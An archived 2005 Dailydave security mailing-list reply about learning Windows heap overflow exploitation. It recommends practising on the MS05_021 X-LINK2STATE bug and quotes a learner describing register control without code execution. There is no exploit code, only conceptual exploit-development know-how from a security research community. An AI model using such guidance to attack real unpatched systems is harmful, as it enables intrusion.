|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: [Dailydave] Understanding Windows Heap Overflows
From: Nicolas Waisman (nicolas
immunitysec.com)
Date: Fri Oct 07 2005 - 10:42:36 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
The best way to learn, is going real. I will recommend you to try
exploiting MS05_021 (the X-LINK2STATE bug) with that bug you will
be able to play pretty easy with the heap layout (which is the real
challenge on Heap exploit, to get whatever primitive you need).
Peace,
Nico
On Fri, Oct 07, 2005 at 10:01:27AM +0100, pbb wrote:
> Thanks guys for all the responses,
>
> I've actually had an app I was playing with (that I suspected had a
> heap overflow that I was trying to exploit.) get an overflow with
> control of the eax and ecx registers so thought I had it but couldn't
> move from here to executing code. I haven't looked at it for a while as
> I knew I didn't understand the technique as well as I thought. I hope
> that I can step through the examples you guys have given me and
> progress ever so slightly in my knowledge of these types of
> exploitation.
>
> I've been stepping through Brett's link and hope this will get me over
> the issue I was having. I'm not sure if it's because the app I was
> looking at was multithreaded and the overflows are not simple like a
> stack one were at the end of the function overflowed it executes.
>
> I try and look at Matt's example over the weekend. Thanks for the help.
>
> Paul.
>
>
>
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]